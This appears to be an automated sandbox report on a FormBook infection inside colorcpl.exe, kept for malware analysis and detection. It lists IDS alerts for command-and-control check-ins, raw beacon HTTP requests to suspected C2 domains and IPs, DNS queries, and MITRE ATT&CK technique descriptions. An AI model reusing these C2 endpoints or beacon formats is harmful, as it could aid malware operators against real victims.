Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction ID: 9cf45158ebd0ef2ee6cbf46f0c5815b10fa0f71d62e7b725df16112a2721dd2c
Opcode Fuzzy Hash: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction Fuzzy Hash: E4812B75D14269DBDB35DB54CC49BEEB7B8AF08710F0041EAAA19B7280D7709E85CFA0

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then xor eax, eax		7_2_032F9DC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_055104E0

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49893 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49794 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49881 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49910 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49969 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49957 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 8.210.3.99:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49925 -> 141.193.213.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50034 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 178.79.184.196:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 162.0.215.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 103.71.154.12:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 162.0.231.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 188.114.97.3:80

Source: Joe Sandbox View	IP Address: 141.193.213.10 141.193.213.10
Source: Joe Sandbox View	IP Address: 141.193.213.10 141.193.213.10

Source: Joe Sandbox View	ASN Name: DV-PRIMARY-ASN1US DV-PRIMARY-ASN1US
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /up8i/?1Zgl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ladylawher.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /9g6s/?1Zgl=l/X+t9hb8CWGjOR1O2ZzXFDzhtuUnyzAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvHeg0TpQiQ+GxS8ts4a8QVaH5DaPjZQFNvIogjfSTI3KXDA==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meanttobebroken.orgUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /li8d/?1Zgl=sm+xvlFNJ8Jn1MAvBLHfFbmpWDRmMBXnhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbroocsQ5/sNLlweHoyZNleSM2rCzfY5hv0qSgJrhCITOEEHg==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jexiz.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /3lre/?1Zgl=/6Vdp+1Y21llHWrnJFgTkMelxgdakbST517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnWVF0YU8xlLcjqFiWcTqSDyUhRRfYLZXOVM1ZwNUIzk+NCQ==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.prediksipreman.fyiUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /855d/?1Zgl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.givora.siteUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /jx6k/?1Zgl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.2925588.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /6o8s/?1Zgl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.wrl-llc.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /l5ty/?1Zgl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.7fh27o.vipUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /7n9v/?w6=2vdPP&1Zgl=5Ps3YXPo0Vj4JhRGre7eusiYM6VqaJdXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5eEZM56pgjuD4M6hDNIlUQpNxKD0Ll6OMyYftw5tyQwWC0A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.rebel.tiendaUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /izfe/?1Zgl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ila.beautyUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /lk0h/?w6=2vdPP&1Zgl=6gjDnw5yzGoGzEh3mjJB1T6RyTIMcIq1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeElEmTDOsUVTaZy7krB/rdHBCDX+Ht0YGWoHEVrkeyh8Ng2A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.college-help.infoUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /17h7/?1Zgl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.owinvip.netUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /x3by/?w6=2vdPP&1Zgl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.gucciqueen.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Source: global traffic	HTTP traffic detected: GET /3p0l/?1Zgl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A==&w6=2vdPP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.timizoasisey.shopUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2

Source: global traffic	DNS traffic detected: DNS query: www.ladylawher.org
Source: global traffic	DNS traffic detected: DNS query: www.meanttobebroken.org
Source: global traffic	DNS traffic detected: DNS query: www.jexiz.shop
Source: global traffic	DNS traffic detected: DNS query: www.prediksipreman.fyi
Source: global traffic	DNS traffic detected: DNS query: www.givora.site
Source: global traffic	DNS traffic detected: DNS query: www.2925588.com
Source: global traffic	DNS traffic detected: DNS query: www.wrl-llc.net
Source: global traffic	DNS traffic detected: DNS query: www.7fh27o.vip
Source: global traffic	DNS traffic detected: DNS query: www.rebel.tienda
Source: global traffic	DNS traffic detected: DNS query: www.ila.beauty
Source: global traffic	DNS traffic detected: DNS query: www.college-help.info
Source: global traffic	DNS traffic detected: DNS query: www.owinvip.net
Source: global traffic	DNS traffic detected: DNS query: www.gucciqueen.shop
Source: global traffic	DNS traffic detected: DNS query: www.xtelify.tech
Source: global traffic	DNS traffic detected: DNS query: www.timizoasisey.shop

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
